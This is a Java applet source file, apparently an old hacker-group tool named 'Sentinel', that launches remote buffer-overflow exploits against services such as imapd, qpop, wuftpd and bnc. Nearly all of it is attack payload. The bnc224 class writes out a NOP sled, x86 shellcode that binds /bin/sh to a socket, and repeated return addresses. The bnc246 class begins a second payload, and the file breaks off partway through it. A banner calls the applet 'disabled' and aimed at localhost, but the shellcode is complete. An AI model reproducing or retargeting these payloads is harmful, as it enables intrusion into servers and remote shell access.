// this fine piece of code was mastered by d0tslash d0tslash@mobsters.net
// if you rip muh code give me credit
// sentinel.java

import java.util.*;
import java.io.*;
import java.net.*;
import java.awt.*;
import java.awt.event.*;
import java.applet.*;
import netscape.security.PrivilegeManager; 

public class sentinel
extends Applet
{
        // Input and console screen shit
        public static TextField field1;
        public static TextField field2;
        public static TextArea area1;
        public static AppletContext ac;
        
        // vuln choices sploitz
        public static CheckboxGroup group1;

        public void init()
        {
		try
		{
			 PrivilegeManager.enablePrivilege("TerminalEmulator");   
		}
		catch (netscape.security.ForbiddenTargetException e)   
		{
		}
		catch (Exception e)   
		{
		}
                try
                {
                        ac = getAppletContext();
                }
                catch(Exception e)
                {

                }

                // fuckin gimme the passwds already!
                Button button1 = new Button("pray");

                area1 = new TextArea(10,50);

                // more console shit
                Label label1 = new Label("Host:");
                field1 = new TextField(6);
                Label label2 = new Label("port:");
                field2 = new TextField(6);
                
                // feel free to add more or change these
                group1 = new CheckboxGroup();
                Checkbox bnc224 = new Checkbox("bnc224", false, group1);
                Checkbox bnc246 = new Checkbox("bnc246", false, group1);
                Checkbox imapd = new Checkbox("imapd", true, group1);
                Checkbox netc = new Checkbox("netc", false, group1);
                Checkbox qpop = new Checkbox("qpop", false, group1);
		Checkbox scopop = new Checkbox("scopop", false, group1);
		Checkbox wuftpd = new Checkbox("wuftpd", false, group1);

                // um like make the button work and shit
                generic_listener genlist1 = new generic_listener(button1);
                
                // this shit needs a good layout manager
                //insert here. =]
                
                this.add(area1);
                
                this.add(label1);
                this.add(field1);

                this.add(label2);
                this.add(field2);

                this.add(button1);
        
                this.add(bnc224);
                this.add(bnc246);
                this.add(imapd);
                this.add(netc);
                this.add(qpop);
                this.add(scopop);
                this.add(wuftpd);

                // default java gray is YUCK!
                // not like this is any better
                this.setBackground(Color.black);
                this.setForeground(Color.white);
		area1.append("b10z crew presents Sentinel" + "\n" + "\n");
		area1.append("this is a dissabled applet..." + "\n");
		area1.append("its released as is to show development stages of this code" +"\n");
		area1.append("all exploits point to localhost on the specified port unless code is modified" + "\n");
		area1.append("as in the text fields  DONT WORK...view the java console in netscape to see errors from connecting or port banners" + "\n");
		area1.append("use nc -l -p <port> -o <file> to debug the code.. or to edit the hex arrays" + "\n"); 
                this.repaint();
        }
}

// um like when u click shit... make your self useful
class generic_listener
{
        public generic_listener(final Button target)
        {
                target.addActionListener(new ActionListener()
                {
                        public void actionPerformed(ActionEvent evt)
                        {
                                Object source = evt.getSource();
                                if(source == source)
                                {
                                        
                                        String current_bug = sentinel.group1.getSelectedCheckbox().getLabel();
                                        
                                        // simple fix add proxies above
                                        if(current_bug.equals("bnc224"))
                                        {
						bnc224 bnc_ex = new bnc224();
						sentinel.area1.append("Sentinel attempting bnc 224 exploit port 22222" + "\n");
                                        }
                                        else if(current_bug.equals("bnc246"))
                                        {
						bnc246 bnc246_ex = new bnc246();
						sentinel.area1.append("Sentinel attempting bnc 246 exploit port 33333" + "\n");
                                        }
                                        if(current_bug.equals("imapd"))
                                        {
						imapd imap_ex = new imapd();
						sentinel.area1.append("Sentinel attempting imapd 10.234 exploit port 143" + "\n");
                                        }
                                        else if(current_bug.equals("scopop"))
                                        {
						scopop sco_ex = new scopop();
						sentinel.area1.append("Sentinel attepmting scopop 2.1.4-r3 exploit port 110" + "\n");
                                        }
					else if(current_bug.equals("netc")) 
					{
						netc netc_ex = new netc();
						sentinel.area1.append("Sentinel attempting netc @Work SmartServer3 3.51 port 25" + "\n");
					}
					else if(current_bug.equals("wuftpd")) 
					{
						wuftpd  wuftpd_ex = new wuftpd();
						sentinel.area1.append("Sentinel attempting wuftpd VR 18 exploit port 21" + "\n");
					}
					else if(current_bug.equals("qpop")) 
					{
						qpop qpop_ex = new qpop();
						sentinel.area1.append("Sentinel attempting qpop 2.1.4-r3 exploit port 110" + "\n");
					}
                                }
                        }
                });
        }
}
class bnc224
{
public bnc224()
{
String host = "localhost";
InputStreamReader inread;
BufferedReader buffread;
int port = 22222;
Socket sock;
InputStreamReader sockin;
String shit = null;
PrintStream sockout;
BufferedReader sockread;
try
{
sock = new Socket(host, port);
sockin = new InputStreamReader(sock.getInputStream());
sockread = new BufferedReader(sockin);
//shit = sockread.readLine();
//System.out.println(shit);
sockout = new PrintStream(sock.getOutputStream());
char[] codez1 = { 0x55, 0x53, 0x45, 0x52, 0x20, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez1);
char[] codez2 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez2);
char[] codez3 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez3);
char[] codez4 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez4);
char[] codez5 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez5);
char[] codez6 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez6);
char[] codez7 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez7);
char[] codez8 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez8);
char[] codez9 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez9);
char[] codez10 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez10);
char[] codez11 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez11);
char[] codez12 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez12);
char[] codez13 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez13);
char[] codez14 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez14);
char[] codez15 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez15);
char[] codez16 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez16);
char[] codez17 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez17);
char[] codez18 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez18);
char[] codez19 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez19);
char[] codez20 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez20);
char[] codez21 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez21);
char[] codez22 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez22);
char[] codez23 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez23);
char[] codez24 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez24);
char[] codez25 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez25);
char[] codez26 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez26);
char[] codez27 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez27);
char[] codez28 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez28);
char[] codez29 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez29);
char[] codez30 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez30);
char[] codez31 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez31);
char[] codez32 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez32);
char[] codez33 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez33);
char[] codez34 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x33, 0xdb, 0x33, 0xc0, 0xb0, 0x1b };
sockout.print(codez34);
char[] codez35 = { 0xcd, 0x80, 0x33, 0xd2, 0x33, 0xc0, 0x8b, 0xda, 0xb0, 0x06, 0xcd, 0x80, 0xfe, 0xc2, 0x75, 0xf4 };
sockout.print(codez35);
char[] codez36 = { 0x31, 0xc0, 0xb0, 0x02, 0xcd, 0x80, 0x85, 0xc0, 0x75, 0x62, 0xeb, 0x62, 0x5e, 0x56, 0xac, 0x3c };
sockout.print(codez36);
char[] codez37 = { 0xfd, 0x74, 0x06, 0xfe, 0xc0, 0x74, 0x0b, 0xeb, 0xf5, 0xb0, 0x30, 0xfe, 0xc8, 0x88, 0x46, 0xff };
sockout.print(codez37);
char[] codez38 = { 0xeb, 0xec, 0x5e, 0xb0, 0x02, 0x89, 0x06, 0xfe, 0xc8, 0x89, 0x46, 0x04, 0xb0, 0x06, 0x89, 0x46 };
sockout.print(codez38);
char[] codez39 = { 0x08, 0xb0, 0x66, 0x31, 0xdb, 0xfe, 0xc3, 0x89, 0xf1, 0xcd, 0x80, 0x89, 0x06, 0xb0, 0x02, 0x66 };
sockout.print(codez39);
char[] codez40 = { 0x89, 0x46, 0x0c, 0xb0, 0x2a, 0x66, 0x89, 0x46, 0x0e, 0x8d, 0x46, 0x0c, 0x89, 0x46, 0x04, 0x31 };
sockout.print(codez40);
char[] codez41 = { 0xc0, 0x89, 0x46, 0x10, 0xb0, 0x10, 0x89, 0x46, 0x08, 0xb0, 0x66, 0xfe, 0xc3, 0xcd, 0x80, 0xb0 };
sockout.print(codez41);
char[] codez42 = { 0x01, 0x89, 0x46, 0x04, 0xb0, 0x66, 0xb3, 0x04, 0xcd, 0x80, 0xeb, 0x04, 0xeb, 0x4c, 0xeb, 0x52 };
sockout.print(codez42);
char[] codez43 = { 0x31, 0xc0, 0x89, 0x46, 0x04, 0x89, 0x46, 0x08, 0xb0, 0x66, 0xfe, 0xc3, 0xcd, 0x80, 0x88, 0xc3 };
sockout.print(codez43);
char[] codez44 = { 0xb0, 0x3f, 0x31, 0xc9, 0xcd, 0x80, 0xb0, 0x3f, 0xfe, 0xc1, 0xcd, 0x80, 0xb0, 0x3f, 0xfe, 0xc1 };
sockout.print(codez44);
char[] codez45 = { 0xcd, 0x80, 0xb8, 0x2e, 0x62, 0x69, 0x6e, 0x40, 0x89, 0x06, 0xb8, 0x2e, 0x73, 0x68, 0x21, 0x40 };
sockout.print(codez45);
char[] codez46 = { 0x89, 0x46, 0x04, 0x31, 0xc0, 0x88, 0x46, 0x07, 0x89, 0x76, 0x08, 0x89, 0x46, 0x0c, 0xb0, 0x0b };
sockout.print(codez46);
char[] codez47 = { 0x89, 0xf3, 0x8d, 0x4e, 0x08, 0x8d, 0x56, 0x0c, 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb };
sockout.print(codez47);
char[] codez48 = { 0xcd, 0x80, 0xe8, 0x45, 0xff, 0xff, 0xff, 0xff, 0xfd, 0xff, 0x50, 0x72, 0x69, 0x76, 0x65, 0x74 };
sockout.print(codez48);
char[] codez49 = { 0x20, 0x41, 0x44, 0x4d, 0x63, 0x72, 0x65, 0x77, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez49);
char[] codez50 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez50);
char[] codez51 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez51);
char[] codez52 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez52);
char[] codez53 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez53);
char[] codez54 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez54);
char[] codez55 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez55);
char[] codez56 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez56);
char[] codez57 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez57);
char[] codez58 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez58);
char[] codez59 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez59);
char[] codez60 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez60);
char[] codez61 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez61);
char[] codez62 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez62);
char[] codez63 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez63);
char[] codez64 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez64);
char[] codez65 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez65);
char[] codez66 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez66);
char[] codez67 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez67);
char[] codez68 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez68);
char[] codez69 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez69);
char[] codez70 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez70);
char[] codez71 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez71);
char[] codez72 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez72);
char[] codez73 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez73);
char[] codez74 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez74);
char[] codez75 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez75);
char[] codez76 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez76);
char[] codez77 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez77);
char[] codez78 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez78);
char[] codez79 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez79);
char[] codez80 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez80);
char[] codez81 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez81);
char[] codez82 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez82);
char[] codez83 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez83);
char[] codez84 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez84);
char[] codez85 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez85);
char[] codez86 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez86);
char[] codez87 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez87);
char[] codez88 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez88);
char[] codez89 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez89);
char[] codez90 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez90);
char[] codez91 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez91);
char[] codez92 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez92);
char[] codez93 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez93);
char[] codez94 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez94);
char[] codez95 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez95);
char[] codez96 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez96);
char[] codez97 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez97);
char[] codez98 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez98);
char[] codez99 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez99);
char[] codez100 = { 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf, 0xff, 0xf6, 0xff, 0xbf };
sockout.print(codez100);
char[] codez101 = { 0xff, 0xf6, 0xff, 0xbf, 0x0a };
sockout.print(codez101);
}
catch(Exception e)
{
System.out.println(e.toString());
}

}
}
class bnc246
{
public bnc246 ()
{
String host = "localhost";
InputStreamReader inread;
BufferedReader buffread;
int port = 33333;
Socket sock;
InputStreamReader sockin;
String shit = null;
PrintStream sockout;
BufferedReader sockread;
try
{
sock = new Socket(host, port);
sockin = new InputStreamReader(sock.getInputStream());
sockread = new BufferedReader(sockin);
//shit = sockread.readLine();
//System.out.println(shit);
sockout = new PrintStream(sock.getOutputStream());
char[] codez1 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez1);
char[] codez2 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez2);
char[] codez3 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez3);
char[] codez4 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez4);
char[] codez5 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez5);
char[] codez6 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez6);
char[] codez7 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez7);
char[] codez8 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez8);
char[] codez9 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez9);
char[] codez10 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez10);
char[] codez11 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez11);
char[] codez12 = { 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20 };
sockout.print(codez12);
char[] codez13 = { 0xeb, 0x20, 0xeb, 0xeb, 0x40, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xeb, 0x20, 0xd4, 0xf3 };
sockout.print(codez13);
char[] codez14 = { 0x04, 0x08, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez14);
char[] codez15 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez15);
char[] codez16 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez16);
char[] codez17 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez17);
